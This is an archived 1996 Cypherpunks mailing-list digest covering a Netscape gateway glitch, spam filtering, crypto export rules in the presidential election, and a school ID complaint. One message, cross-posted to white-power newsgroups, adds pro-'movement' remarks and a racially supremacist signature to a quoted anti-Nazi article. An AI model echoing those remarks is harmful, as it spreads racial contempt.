keep a set of bogus messages off of the list.  Many thanks go to John
Gilmore for fixing the problem.
  The next message will be a (almost) digest of the 17 messages that
were not passed on in real time to the list.

  Think of it as a vacation.

		||ugh Daniel
		Majordomo Owner & Potty Trainer
		hugh@toad.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hugh Daniel <hugh@ecotone.toad.com>
Date: Mon, 26 Aug 1996 22:14:39 +0800
To: cypherpunks@toad.com
Subject: DIGEST: 17 messages from the last day
Message-ID: <199608260905.CAA22219@ecotone.toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>From cpadmin@toad.com  Sun Aug 25 00:43:46 1996
Received: from tera.mcom.com (tera.netscape.com [205.217.237.94]) by toad.com (8.7.5/8.7.3) with SMTP id AAA17288 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 00:44:34 -0700 (PDT)
Received: (from news@localhost) by tera.mcom.com (8.6.12/8.6.9) id AAA04984; Sun, 25 Aug 1996 00:46:00 -0700
To: cypherpunks@toad.com
Path: usenet
From: Tom Weinstein <tomw@netscape.com>
Newsgroups: mcom.list.cypherpunks
Subject: Re: Weird "Suppression" messages
Date: Sun, 25 Aug 1996 00:43:53 -0700
Organization: Netscape Communications, Inc.
Lines: 42
Message-ID: <32200439.41C6@netscape.com>
References: <3.0b11.32.19960823232429.00d969ec@mail.teleport.com>
NNTP-Posting-Host: ammodump.mcom.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Mailer: Mozilla 3.0 (X11; U; IRIX 5.3 IP22)

Alan Olsen wrote:
> 
> At 10:36 PM 8/23/96 -0700, Z.B. wrote:
>>On Fri, 23 Aug 1996, Alan Olsen wrote:
>>
>>> At 10:54 PM 8/20/96 -0700, Rich Graves wrote:
>>> >   ----- Message body suppressed -----
>>> >
>>> >--SAA08114.840765294/tera.mcom.com--
>>>
>>> This is bizzare.  I have gotten three messages with this message.
>>>
>>> Is someone at Netscape canceling messages?  (mcom.com is the old
>>> domain name
>>> of Netscape.)
>>>
>>> Anyone have any ideas on this?
>>
>> I don't have a clue what it is, but it's sure pissing me off.  I've
>> gotten about 15 or so of these messages in the past two hours.  If
>> it's an honest error, then someone better fix it real fast; if some
>> loser is jerking us around, ......
> 
> Some list redirector of somesort has gone wonky at Netscape.  (Take a
> look at the headers if you do not believe me.  They are originating
> off of some internal lists at mcom.com, the original Netscape domain.)
> 
> Cypherpunks is not the only list effected by this.  I am getting these
> weird messages on wwwsecurity as well.
> 
> Since it is Friday, I expect that this will be with us until someone
> gets in the office on Monday.

We have a gateway here that gateways mailing lists into newsgroups and
sends posts back out to the mailing lists.  There was a problem with it
which caused these strange suppression messages.  I got the person
responsible to come in and fix it, so there should be no more messages
like that, I hope.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com

>From cpadmin@toad.com  Sun Aug 25 02:04:41 1996
Received: from irc.io-online.com ([206.245.244.5]) by toad.com (8.7.5/8.7.3) with ESMTP id CAA18654 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 02:05:30 -0700 (PDT)
Received: from IO-ONLINE.COM ([206.245.244.154]) by irc.io-online.com
          (post.office MTA v1.9.3b ID# 285-17715) with SMTP id AAA47;
          Sun, 25 Aug 1996 02:05:45 -0700
From: Adamsc@io-online.com (Adamsc)
To: "cypherpunks@toad.com" <cypherpunks@toad.com>,
        "William H. Geiger III" <whgiii@amaranth.com>
Date: Sun, 25 Aug 96 02:05:22 -0800
Reply-To: "Chris Adams" <adamsc@io-online.com>
Priority: Normal
X-Mailer: Chris Adams's Registered PMMail 1.52 For OS/2
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Subject: Re: Spamming (Good or Bad?)
Message-ID: <19960825090543625.AAA47@IO-ONLINE.COM>

On Sat, 24 Aug 96 03:47:47 -0500, William H. Geiger III wrote:

>No I have to dissagree. Who I send mail to or whom I receive mail from is >no-ones business. I for one have no intention of "signing up" or >"regestering" with any mail server. I most certainally want to be the one >to decide what mail I receive or do not receive, not someone elses idea of >what I should receive.

What I'd prefer is a configurable POP server for an ISP - something that you
could set to, say, only send a brief header and 1st couple lines of any message
that is either over a certain size, repeated, or passed the limit for messages
from a given host.  So you could set certain people to have their messages pass
directly through, something like cypherpunks might get more and all others
could be limited to something like 10/day.  Have all of this configured right,
as well has host-end filtering/rejecting and such tasks would be done with the
high bandwidth a host has, as opposed to your average dialup link.

>Sorry but I will not be made a sheep for the "protection" from spam. baah >baah

Baah humbug! (And I agree fully!)

/ If you think education is expensive, try ignorance.
/ Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
/ Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
/ Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
/ Member in good standing of the GNU whirled hors d'oeuvre

>From cpadmin@toad.com  Sun Aug 25 03:21:23 1996
Received: from pop1.jmb.bah.com (pop1.jmb.bah.com [156.80.9.161]) by toad.com (8.7.5/8.7.3) with ESMTP id DAA19560; Sun, 25 Aug 1996 03:22:11 -0700 (PDT)
Received: from crypto-1.bah.com ([156.80.2.177]) by pop1.jmb.bah.com (8.7.5/8.7.3) with SMTP id GAA26790; Sun, 25 Aug 1996 06:27:50 -0400 (EDT)
Received: by crypto-1.bah.com with Microsoft Mail
	id <01BB924D.9E549120@crypto-1.bah.com>; Sun, 25 Aug 1996 06:21:14 -0000
Message-ID: <01BB924D.9E549120@crypto-1.bah.com>
From: Charley Sparks <sparks@bah.com>
To: "'cypherpunks@toad.com'" <cypherpunks@toad.com>
Cc: "'cypherpunk@toad.com'" <cypherpunk@toad.com>
Subject: Need the majordomo commands for cypherpunk
Date: Sun, 25 Aug 1996 06:21:13 -0000
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNED MESSAGE-----

the heading says it all....

-----BEGIN PGP SIGNATURE-----
Version: 2.9

iQCXAgUBMiA3KOJ+JZd/Y4yVAQHaJQQMC4i3iPpinbyMfQ8x6wOrQEFYFg7kt1Qf
trmMt4nwNSwy3ZV2EAS/ohm9BMz9PWfiAvetcpyPf2QZxQS9ZBqF69TqmpRkX7Xe
ke6Cz4GqYy51MM29WuE1nvPRSELHvrsubq9A1U2+QeArOC6sw6mVZFMFClP+I2NI
q9NH9sjEljgXTw==
=nFIP
-----END PGP SIGNATURE-----

>From cpadmin@toad.com  Sun Aug 25 05:28:39 1996
Received: from dns1.noc.best.net (root@dns1.noc.best.net [206.86.8.69]) by toad.com (8.7.5/8.7.3) with SMTP id FAA22362 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 05:29:27 -0700 (PDT)
Received: from jamesd.vip.best.com (jamesd.vip.best.com [204.156.153.125]) by dns1.noc.best.net (8.6.12/8.6.5) with SMTP id FAA21914; Sun, 25 Aug 1996 05:29:16 -0700
Message-Id: <199608251229.FAA21914@dns1.noc.best.net>
X-Sender: jamesd@best.com
X-Mailer: Windows Eudora Version 2.1
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sat, 24 Aug 1996 17:06:32 -0700
To: Vincent Cate <vince@offshore.com.ai>, cypherpunks@toad.com
From: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Cypherpunk voting - ITAR or CDA

At 01:37 AM 8/25/96 -0400, Vincent Cate wrote:
> So it seems Dole is the better vote.  Is this important enough to many
> cypherpunks to actually determine their vote?

Dole stands for nothing, and Clinton stands for everything.

Any resemblance between their election platforms and what they
will actually do when in office is purely coincidental.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com

>From cpadmin@toad.com  Sun Aug 25 05:41:56 1996
Received: from tipper.oit.unc.edu (tipper.oit.unc.edu [152.2.22.85]) by toad.com (8.7.5/8.7.3) with SMTP id FAA22601 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 05:42:45 -0700 (PDT)
Received: from hilly.oit.unc.edu (cnc019039.concentric.net [206.173.35.39]) by tipper.oit.unc.edu (8.6.12/8.6.10) with SMTP id IAA22997 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 08:42:42 -0400
Date: Sun, 25 Aug 1996 08:42:43 -0400 ()
From: Simon Spero <ses@tipper.oit.unc.edu>
To: cypherpunks@toad.com
Subject: -- Message body depressed --
Message-ID: <Pine.WNT.3.95.960825084108.-7095A-100000@hilly.oit.unc.edu>
X-X-Sender: ses@tipper.oit.unc.edu
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Life. Don't talk to me about Life.  The first 100 spams were the worst.
The second 100 spams were the worst as well. After that I went into a bit
of decline. 



>From cpadmin@toad.com  Sun Aug 25 06:06:43 1996
Received: from osceola.gate.net (root@osceola.gate.net [199.227.0.18]) by toad.com (8.7.5/8.7.3) with SMTP id GAA23105 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 06:07:30 -0700 (PDT)
Received: from miafl2-30.gate.net (miafl2-30.gate.net [199.227.2.157]) by osceola.gate.net (8.6.13/8.6.12) with SMTP id JAA97272 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 09:07:16 -0400
Date: Sun, 25 Aug 1996 09:07:16 -0400
Message-Id: <199608251307.JAA97272@osceola.gate.net>
From: Jim Ray <liberty@gate.net>
To: cypherpunks@toad.com
X-Priority: Normal
Subject: Re: Cypherpunk voting - ITAR or CDA
X-Mailer: Pronto Secure [Ver 1.05]
MIME-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Pgprequest: signed

-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Sun Aug 25 09:06:51 1996
Vincent Cate wrote:

> Dole says he would fix the ITAR problem, but try to keep something like
> CDA. 

He would say anything to get elected.

> Clinton is keeping ITAR and signed CDA.  But not having the religious
> right he might soften on CDA.

Lame ducks don't have to soften, on anything. That's what's fun about being 
a lame duck.

> The courts seem to be throwing out CDA much faster than ITAR (some fast
> track to the supreme court built into the law).  It also seems like
>  ITAR
> is the more important thing to fix (it is easier to move pornography
>  etc
> out of the US than major software companies). 
> 
> So it seems Dole is the better vote.  Is this important enough to many
> cypherpunks to actually determine their vote?

If the Republican candidate had been Forbes, there might have been a "don't 
let the great be the enemy of the good" argument against voting 
Libertarian. As it stands now, Dole is, at best, arguably the "lesser of 2 
evils," which still comes out evil in my book. As the designated partisan 
Libertarian on the list, I urge all cypherpunks to vote their consciences 
and pick Harry Browne and Jo Jorgensen. The mere fact that the media is 
[grudgingly] covering us suggests we are finally doing something right, and 
Harry is winning many Internet polls despite much fawning, hopeful coverage 
for the big-eared billionaire hypocrite stealth-candidate, who has no 
position but certainly would enjoy having the TLAs investigate his enemies.

I fully accept that it is likely Dole or Clinton will win, but I think it 
will fill an important cypherpunk goal if the Libertarian Party candidates 
get a vote large enough to be the margin of victory, and I will be very 
proud of my vote, no matter who wins this election. Vote your consciences 
for your own sake, and the sake of the children who will inherit the debt 
of the irresponsible statists in power now.
JMR

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"'Filegate' is starting to make _Ed_ _Meese_ look ethical."
 -- me
 Defeat the Duopoly! Vote "NOTA," not Slick/Dull in November.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray C
Ross Perot is now on welfare.<sigh>
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMiBP8m1lp8bpvW01AQFIJAQAlXsJF6cbghTbNe026MYY2UmG6BWPHeUe
clf8KSRdT3Fxr/U5juo9FhroDmKSverVkl7ReCQ9Vfxcw0bBdhopJYvkVzB4AOeh
8EMIQnuUGjtPydJvf1pcMUu+C2j7HfhPvI33P3q0v7iG9bb5o6eIzoTMifsc1Kzk
n9rakt5JoGg=
=c8mZ
-----END PGP SIGNATURE-----

>From cpadmin@toad.com  Sun Aug 25 08:16:36 1996
Received: from netcom10.netcom.com (qut@netcom10.netcom.com [192.100.81.120]) by toad.com (8.7.5/8.7.3) with SMTP id IAA01414 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 08:17:24 -0700 (PDT)
Received: (from qut@localhost) by netcom10.netcom.com (8.6.13/Netcom)
	id IAA04507; Sun, 25 Aug 1996 08:17:22 -0700
Date: Sun, 25 Aug 1996 08:17:22 -0700
From: qut@netcom.com (Skipp OBC)
Message-Id: <199608251517.IAA04507@netcom10.netcom.com>
To: Thetapunks <cypherpunks@toad.com>
Newsgroups: alt.politics.white-power,alt.politics.nationalism.white,can.politics,alt.discrimination,alt.revisionism
Subject: Re: Where have all the racists gone? Griswold, LA Times story
References: <4vo52r$or2@freenet-news.carleton.ca> <rcgraves-2408962338530001@nntp.stanford.edu>
X-No-Archive: yes

In <rcgraves-2408962338530001@nntp.stanford.edu> rcgraves@ix.netcom.com (Skippy) writes:

! -----BEGIN PGP SIGNED MESSAGE-----
! 
! In article <4vo52r$or2@freenet-news.carleton.ca>,
! ai433@FreeNet.Carleton.CA (John Baglow) wrote:
! 
! > So, where *is* Les Griswold? Readers are invited to speculate.
! 
! I don't need to.
! 
! Racists come, racists go. Milton Kleim, George Graves, Ron Schoedel, and
! Les Griswold are all out of the business. The Nazi troller who dedicates
! himself to "The Movement" for life is rare. Human beings have large,
! well-developed brains. This enables us to use tools, read, write, speak,
! and see through the appeal of Nazism. Only the real psychopaths (Metzger),
! charlatans in it for the money (Zundel), and criminals (Burdi, Droege,
! Mathews) stick with "The Movement" once they understand what it's really
! about.
! 
! [Yes, I'm aware that things are a bit more serious and complex in real
! life, but I do think it's fine to gloat now, when the "Net.Nazis" are so
! few and disorganized that their #1 troller, qut@netcom.com, is believed to
! be an anti-racist parodying them.]

The movement must learn to deal with these situations.

! Another bit of good news, and perhaps an inspiration for those few racists
! still reading alt.politics.white-power:
! 
! "Ex-Skinhead breaks from a racist past"
! San Jose Mercury News, August 19, 1986, page 3B.
! Reprint of a story from the Los Angeles Times.
! 
! LOS ANGELES -- Even among his fellow skinheads, Tom Leyden stood out as an
! angry warrior.
! 
! Leyden recalls prowling the streets at night, pummeling "blacks, Hispanics
! and longhairs" with his steel-toed boots. In the Marines, he kept a copy
! of Adolf Hitler's "Mein Kampf" next to his bunk. At home, he hung a Nazi
! flag over the baby's crib.
! 
! Leyden, 30, might seem like a dubious candidate to lead a crusade against
! white supremacists. But this tattooed high school dropout has broken with
! his racist past and joined ranks with an unlikely ally -- the Simon
! Wiesenthal Center.
! 
! It is a rare and unexpected alliance.
! 
! Leyden is the first skinhead to voluntarily lend his expertise to the
! Wiesenthal Center since it opened in Los Angeles 19 years ago. Skeptical
! leaders of the center -- a watchdog organization that fights anti-Semitism
! and other forms of prejudice -- greeted his arrival last month with
! suspicion. They wondered whether he was a spy.
! 
! But Leyden offered inside information about neo-Nazi methods: how they
! recruit young members by inciting racial violence on school campuses and
! by distributing music that preaches the death of Jews, blacks and other
! groups.
! 
! He also discounted his disillusionment with a movement that labeled his
! own mother inferior because she was handicapped. He spoke out about the
! angst of watching his sons -- ages 4 and 2 -- grow up as hatemongers
! saluting the Nazi and Confederate flags.
! 
! And he recounted his decision to leave his wife of six years for a chance
! to redeem himself.
! 
! "I got the impression that this was a person who has had a profound change
! of heart and who is willing to tell the world, 'I was wrong,'"" recalled
! Rabbi Marvin Hier, the Wiesenthal Center's founder. "He is saying,
! 'Everything I've stood for in the last decade was for nothing.' That's
! admitting to a life's mistake."
! 
! Now the Wiesenthal Center and Leyden are putting his firsthand knowledge
! of neo-Nazi activities to work -- a plan that has earned Leyden a
! "traitor" label among former skinhead associates.
! 
! The center has arranged for Leyden to address a national hate conference
! in Miami in October. Leyden is also scheduled to speak about hate groups
! in the military during an upcoming visit to Fort Bragg, the North Carolina
! Army base where swastikas were found last month painted on the doors of
! rooms occupied by white soldiers.
! 
! Leyden's family now fears for its safety. He said late-night callers
! frequently hang up or leave obscene messages.
! 
! But Leyden refuses to let the threats scare him.
! 
! "I think Tom has already removed the tattoos inside," said Rabbi Abraham
! Cooper, associate dean at the Wiesenthal Center. "He's made some really
! severe errors. But he has my respect, which is the last thing I thought
! I'd be saying about someone who spent years in the skinhead movement."
! 
!                                - 30 -
! -----BEGIN PGP SIGNATURE-----
! Version: 2.6.2
! 
! iQBVAwUBMh/065NcNyVVy0jxAQESeQH+M9A1vU5hxZnOID7gNAWkmQabQTwe9uv/
! LWETIkkWQoHqnEYlcjtgxC1ayDu1xBC0rEpvA/MPL/LauCkrxRbaAw==
! =C7nU
! -----END PGP SIGNATURE-----
! 
! -rich
!  http://www.anonymizer.com:8080/http://www.c2.org/~rich/

Easy come, easy go.


--
I marvel at the resilience of the white people.
Their best characteristic is their desire to learn.
No other people has such an obsession with the intellect.

>From cpadmin@toad.com  Sun Aug 25 08:46:32 1996
Received: from wichita.fn.net (root@wichita.fn.net [204.233.71.1]) by toad.com (8.7.5/8.7.3) with ESMTP id IAA03380 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 08:47:21 -0700 (PDT)
Received: from steve.shelby.com (mark108.fn.net [204.233.108.131]) by wichita.fn.net (8.7.4/8.6.9) with SMTP id KAA13490 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 10:47:18 -0500 (CDT)
Message-Id: <2.2.32.19960825144031.006d5e80@mail.fn.net>
X-Sender: sshelby@mail.fn.net
X-Mailer: Windows Eudora Pro Version 2.2 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sun, 25 Aug 1996 10:40:31 -0400
To: cypherpunks@toad.com
From: Steve Shelby <sshelby@wichita.fn.net>
Subject: Posting HTML.


When posting an article that was originally HTML, perhaps you could save it
as a text instead?

Makes it a little easier to read.

Thanks

>From cpadmin@toad.com  Sun Aug 25 08:56:21 1996
Received: from mail-1.mail.demon.net (mail-1.mail.demon.net [158.152.1.211]) by toad.com (8.7.5/8.7.3) with SMTP id IAA04034 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 08:57:07 -0700 (PDT)
From: paul@fatmans.demon.co.uk
Received: from post.demon.co.uk ([158.152.1.72]) by mail-1.mail.demon.net
           id ag08175; 25 Aug 96 16:53 BST
Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
          id aa17201; 25 Aug 96 16:52 +0100
Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP 
	id AA840935122 ; Sun, 25 Aug 96 01:05:22 +0000
Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
To: cypherpunks@toad.com
Date: Sun, 25 Aug 1996 01:05:21 +0000
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: subscribe cypherpunks
Priority: normal
X-mailer: Pegasus Mail for Windows (v2.31)
Message-ID: <840988336.17201.0@fatmans.demon.co.uk>

SUBSCRIBE cypherpunks paul@fatmans.demon.co.uk

  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       "Don`t forget to mount a scratch monkey"

>From cpadmin@toad.com  Sun Aug 25 12:13:53 1996
Received: from laguna.arc.unm.edu (laguna.arc.unm.edu [198.59.173.7]) by toad.com (8.7.5/8.7.3) with ESMTP id MAA16785 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 12:14:37 -0700 (PDT)
Received: from alb-nm4-03.ix.netcom.com (finite@alb-nm4-03.ix.netcom.com [206.214.146.67]) by laguna.arc.unm.edu (8.7.3/8.7.3) with SMTP id NAA01875 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 13:14:34 -0600 (MDT)
Message-Id: <1.5.4.16.19960825191447.0b77e912@arc.unm.edu>
X-Sender: drosoff@arc.unm.edu
X-Mailer: Windows Eudora Light Version 1.5.4 (16)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sun, 25 Aug 1996 13:14:47 -0600
To: cypherpunks@toad.com
From: David Rosoff <drosoff@ARC.unm.EDU>
Subject: You have your papers, please? [off-topic]

-----BEGIN PGP SIGNED MESSAGE-----

Today, I returned to school, a bright shiny venture into my junior year.
Only slightly dampened by the closing of campuses - well, I should explain.
High school campuses have typically been "open" here in Albuquerque, which
to put it simply means that school is dismissed for lunch and opens again after
it. But, in the traditional school style, that is, punishing the many for the
crimes of the few, the politically-controlled and very partisan school board 
decided last year to close them, which would of course stop all the fights and
robberies and graffiti during the noon hour, and not push it up two hours at all.
Of course. This is rather drastic, so in an atypical show of clemency the people
who do things to me for my own good decided to phase it in. Thus it affects me
not at all - or so I thought. So my mood today wasn't really affected by this
violation of rights, because I had my mind on other things.

Until I was informed that I must carry my school-issued picture ID that is
barely recognizable as human at all times, because at any time on campus a
Gestapo agent disguised as a "campus aide" could demand to make sure that
my papers were in order. When going to lunch I was carded to leave campus.
Taking out my anger on someone who probably didn't deserve it, I said, 
"Are my papers in order, mein Fuehrer?" My, my, if looks could kill. The
disturbing thing is that while I know it really is not a big deal to have
to carry a dumb school ID so that bad rules can be enforced, no one around
me understood why I was upset. I am worried that happenings of this sort will
give Big Brother an opening for universal IDs and internal passports. No one
will question it because they've been doing it their whole lives. And of course,
anyone who does object must be a pervert, criminal, or other social deviant.

===============================================================================
David Rosoff (nihongo ga sukoshi dekiru)  --------------->  drosoff@arc.unm.edu
PGP public key 0xD37692F9 -----> finger drosoff@acoma.arc.unm.edu or keyservers
0xD37692F9  Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
Do you know who's reading your email? ---> http://www.arc.unm.edu/~drosoff/pgp/
Is it a forgery? --- I have PGP signed all email and news posts since May 1996.
===============================================================================
"Your Honor, I have been following this person's movements for quite some time,
and I can prove that he is in possession of secret government underwear."

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMhkizhguzHDTdpL5AQHGTwQAq2bYziwWjHsTm2WgxBpN6ch8vZcpVkRQ
oKfR1XfshzObsvNup4Hr5q1LsgWXef8nb1Br49TSGj4u4GBWrfzuowftfDkem5JN
YXpIX6QSsZeXKMMW06S7MnOM6qL5u83s8SKCS+amnpVEQcxhFNXkb8CMo0+6Kwid
NZwSgwjtgYU=
=c1Tj
-----END PGP SIGNATURE-----

>From cpadmin@toad.com  Sun Aug 25 13:19:48 1996
Received: from mailhost1.primenet.com (mailhost1.primenet.com [206.165.5.51]) by toad.com (8.7.5/8.7.3) with ESMTP id NAA18464 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 13:20:36 -0700 (PDT)
Received: from primenet.com (root@usr06.primenet.com [206.165.5.106]) by mailhost1.primenet.com (8.7.5/8.7.1) with ESMTP id NAA00959 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 13:20:34 -0700 (MST)
Received: from heavily.censored.org (heavily.censored.org [206.165.50.96]) by primenet.com (8.7.5/8.7.5) with SMTP id NAA25762 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 13:07:27 -0700 (MST)
Message-Id: <2.2.16.19960825201159.232fec0e@primenet.com>
X-Sender: carolab@primenet.com
X-Mailer: Windows Eudora Pro Version 2.2 (16)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sun, 25 Aug 1996 15:11:59 -0500
To: cypherpunks@toad.com
From: Censored Girls Anonymous <carolann@censored.org>
Subject: Re: Ruritania 

I thank all of you for your fine detective work.

I found this on the tsmenace list without an attribute.
It was a strange place for it, as it was cypherpunk in content.
But as it applies anywhere, (and the using PGP on a political
activist list project continues), at least they are making some
progress in their thinking. The article drew no flames whatsoever.

I will Mr. Perry, happily inform the tsmenace list (tsmenace@zoom.com)
who the originator of the article is.

Love Always,

Carol Anne

At 01:32 PM 8/24/96 -0400, you wrote:

>>                       The Legend of Ruritania 
> technology had been developed,  and in this new age of wood, everyone in

>When people repost my writing, I prefer that they leave some
>indication on that I wrote it.
>
>Perry
>
>
Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/

>From cpadmin@toad.com  Sun Aug 25 14:46:45 1996
Received: from server.multipro.com (root@server.multipro.com [204.253.122.2]) by toad.com (8.7.5/8.7.3) with SMTP id OAA20422 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 14:47:31 -0700 (PDT)
Received: from LOCALNAME (s5.pm.crossville.multipro.com [207.78.144.15]) by server.multipro.com (8.6.9/8.6.9) with SMTP id QAA09138 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 16:35:53 -0500
Message-Id: <199608252135.QAA09138@server.multipro.com>
X-Sender: nick@mail.multipro.com
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sun, 25 Aug 1996 16:49:12 -0500
To: cypherpunks@toad.com
From: Nick West <nick@multipro.com>
Subject: URL for Browne and crypto

"Stop the Browne Out!" now has a page that compares Harry Browne to Clinton
& Dole on the subject of digital privacy. The URL is
http://home.connectnet.com/qqq/crypto/ . They have various links and a logo
you can add to your web site to link to the page.

Nick West
nick@multipro.com
Member of the National Wild Turkey Federation and 
The Libertarian Party of Tennessee

http://members.tripod.com/~NWest/index.html

PGP Fingerprint= F9 F7 92 D9 D3 0B 56 3E  FA 2A 78 59 27 32 7D 6F

Public key available on request.

>From cpadmin@toad.com  Sun Aug 25 16:05:04 1996
Received: from dns2.noc.best.net (dns2.noc.best.net [206.86.0.21]) by toad.com (8.7.5/8.7.3) with SMTP id QAA22928 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 16:05:54 -0700 (PDT)
Received: from sophi.best.com (sophi.vip.best.com [206.86.81.52]) by dns2.noc.best.net (8.6.12/8.6.5) with ESMTP id QAA05562; Sun, 25 Aug 1996 16:05:46 -0700
Message-Id: <199608252305.QAA05562@dns2.noc.best.net>
From: "Greg Kucharo" <sophi@best.com>
To: "Vincent Cate" <vince@offshore.com.ai>, <cypherpunks@toad.com>
Subject: Re: Cypherpunk voting - ITAR or CDA
Date: Sun, 25 Aug 1996 16:07:53 -0700
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

  Does it matter?  Shound't the fight here be in the courts and Congress as
opposed to the President?  The problem here is a constant one.  If you vote
Republican, it opens the door for less stringent economic laws but greater
restriction on social freedoms.  The Democrats are tradtionaly the
opposite.
  It's like the Janus. They speak of countermanding viewpoints, but in the
end the truth lies somewhere in the middle.  There will undoubtely be
watered down versions of both laws in effect.  My guess is that a new ITAR
style would run along the lines of current arms trafficking regulations. 
That means no trading yer crypto with the so-called rogue states. 
Impossible, but we are talking about the U.S. Government here.  I have no
idea how they could enforce anything like the CDA.  Possibly they would
promote the use of restictive services in browsers.  Who knows.

----------
> From: Vincent Cate <vince@offshore.com.ai>
> To: cypherpunks@toad.com
> Subject: Cypherpunk voting - ITAR or CDA
> Date: Saturday, August 24, 1996 10:37 PM
> 
> 
> Dole says he would fix the ITAR problem, but try to keep something like
> CDA. 
> 
> Clinton is keeping ITAR and signed CDA.  But not having the religious
> right he might soften on CDA.
> 
> The courts seem to be throwing out CDA much faster than ITAR (some fast
> track to the supreme court built into the law).  It also seems like ITAR
> is the more important thing to fix (it is easier to move pornography etc
> out of the US than major software companies). 
> 
> So it seems Dole is the better vote.  Is this important enough to many
> cypherpunks to actually determine their vote?
> 
>   --  Vince
> 
> -----------------------------------------------------------------------
> Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
> Offshore Information Services         http://www.offshore.com.ai/

>From cpadmin@toad.com  Sun Aug 25 17:17:49 1996
Received: from mstrinet.usmc.mil ([192.156.78.41]) by toad.com (8.7.5/8.7.3) with SMTP id RAA24560 for <cypherpunks@toad.com>; Sun, 25 Aug 1996 17:18:38 -0700 (PDT)
Received: by mstrinet.usmc.mil; Sun, 25 Aug 96 6:20:48 -0400
Date: Sun, 25 Aug 96 6:20:45 -24000
Message-ID: <vines.Afe5+xX06mB@mstrinet.usmc.mil>
X-Priority: 3 (Normal)
To: <cypherpunks@toad.com>
From: <MAILER-DAEMON@mqg-smtp3.usmc.mil>
Subject: Undeliverable Message
MIME-Version: 1.0
Content-type: text/plain;
               charset=ISO-8859-1

To:            <cypherpunks@toad.com>
Cc:            
Subject:       Re: "----- Message body suppressed -----"

Message not delivered to recipients below.  Press F1 for help with VNM
error codes.               

	VNM3043:  BANYAN SERVER@MAG26@2DMAW NEW RIVER


VNM3043 -- MAILBOX IS FULL

   The message cannot be delivered because the
   recipient's mailbox contains the maximum number of 
   messages, as set by the system administrator.  The
   recipient must delete some messages before any
   other messages can be delivered.
    The maximum message limit for a user's mailbox is 
   10,000.  The default message limit is 1000 messages.  
   Administrators can set message limits using the 
   Mailbox  Settings function available in the 
   Manage User menu  (MUSER). 

